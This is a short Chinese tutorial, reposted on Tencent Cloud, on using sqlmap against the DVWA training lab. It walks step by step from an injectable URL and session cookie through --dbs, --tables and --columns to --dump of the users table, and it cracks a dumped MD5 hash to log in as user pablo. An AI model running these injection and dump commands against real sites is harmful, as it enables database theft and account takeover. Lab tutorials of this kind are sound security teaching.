首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >工具使用 | sqlmap的简单使用--以DVWA为靶场

工具使用 | sqlmap的简单使用--以DVWA为靶场

作者头像
TeamsSix
发布2019-09-24 17:43:43
发布2019-09-24 17:43:43
1.9K00
代码可运行
举报
运行总次数:0
代码可运行

0x00 找到注入点

代码语言:javascript
代码运行次数:0
运行
复制
http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

0x01 利用sqlmap进行注入

代码语言:javascript
代码运行次数:0
运行
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"

期间会遇到一些询问,可以自己判断是还是否,也可以一路回车,最后将会显示出靶机的一些相关信息,比如数据库版本、系统类型等

利用—dbs参数获取数据库信息

代码语言:javascript
代码运行次数:0
运行
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  --dbs

利用-D指定数据库,—tables查看该数据库下所有表

代码语言:javascript
代码运行次数:0
运行
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa --tables

利用-T指定表,—colums查看该表下所有列

代码语言:javascript
代码运行次数:0
运行
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users --columns

最后利用-C指定列,—dump进行脱裤

代码语言:javascript
代码运行次数:0
运行
复制
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"  -D dvwa -T users -C user,password --dump

对密码的MD5值进行解密,这里以pablo用户的密码MD5值为例

0x02 利用爆出的用户名密码登陆系统

利用Sqlmap爆出的用户pablo,密码letmein进行登陆

成功登陆,关于sqlmap的用法还有很多,这里只介绍了最为常见的一种。


本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-05-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 TeamsSix 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 找到注入点
  • 0x01 利用sqlmap进行注入
  • 0x02 利用爆出的用户名密码登陆系统
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档